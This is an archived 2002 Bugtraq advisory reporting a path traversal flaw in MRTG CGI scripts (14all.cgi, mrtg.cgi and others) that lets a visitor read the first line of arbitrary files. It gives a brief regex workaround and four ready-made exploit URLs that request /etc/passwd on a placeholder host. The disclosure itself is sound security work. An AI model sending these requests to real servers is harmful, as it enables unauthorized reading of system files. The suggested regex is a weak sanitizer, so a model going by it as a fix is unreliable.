[24072] in bugtraq
new advisory
daemon@ATHENA.MIT.EDU (UkR-XblP?)
Sat Feb 2 12:03:09 2002
From: "UkR-XblP?" <cuctema@ok.ru>
To: BUGTRAQ@securityfocus.com
Date: Sat, 02 Feb 2002 04:47:29 +0300
Message-ID: <web-13380375@backend2.aha.ru>
MIME-Version: 1.0
Content-Type: text/plain; charset="KOI8-R"; format="flowed"
Content-Transfer-Encoding: 8bit
---=== UkR Security Team advisory
===---
Name : MRTG CGI script "show files" Vulnerability
About : The Multi Router Traffic Grapher (MRTG) is
a tool to monitor the traffic
load on network-links. MRTG generates
HTML pages containing GIF
images which provide a LIVE visual
representation of this traffic
Product vendor: MRTG / http://www.mrtg.org
Problem : Problem lyes in incorrect validation of
user submitted
-by-browser information, that can show
first string of any file of the
system where script installed.
Workaround : this will help in somewhat : $input =~
s/[(\.\.)|\/]//g;
Author : UkR-XblP / UkR security team
Exploit :
http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
---
Professional hosting for everyone - http://www.host.ru
